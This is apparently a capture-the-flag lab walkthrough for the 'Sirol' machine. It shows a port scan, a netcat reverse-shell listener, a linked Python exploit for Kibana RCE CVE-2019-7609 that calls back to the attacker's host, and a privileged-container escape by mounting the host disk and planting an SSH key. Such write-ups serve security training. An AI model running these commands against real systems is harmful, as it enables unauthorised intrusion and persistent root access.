Sirol


Last updated 3 years ago


nmap

sudo rustscan -a 192.168.225.54 --ulimit 5000 -- -T4 -A -oA nmap/all-ports-service-scan

Kibana is running on port 5601

Web enumeration

Kibana reports version 6.5.0, which is vulnerable to remote code execution (CVE-2019-7609, the exploit linked at the end of this page).

Exploitation

Set a reverse shell listener

sudo nc -lvnp 80

Run the exploit

python exploit.py -u http://192.168.225.54:5601 -host <your machine's IP> -port 80 --shell

And you should receive a root shell inside a Docker container.

Privilege Escalation

It looks like the container was started with the --privileged flag, since we can run fdisk -l and see the host's disks.

Let's mount /dev/sda1

mkdir -p /mnt/hola
mount /dev/sda1 /mnt/hola

Create a .ssh folder in the host's /root

cd /mnt/hola/root
mkdir .ssh
cd .ssh

Copy the contents of your .ssh/id_rsa.pub and paste them into the remote machine's .ssh/authorized_keys

echo 'insert your public ssh key' > authorized_keys

Now you can SSH directly to the machine and escape the container.

Thanks for reading and enjoy the rest of your day!

Visit the repository below and copy the Python exploit (the exploit.py used in the Exploitation step) to your local machine.

https://github.com/LandGrey/CVE-2019-7609/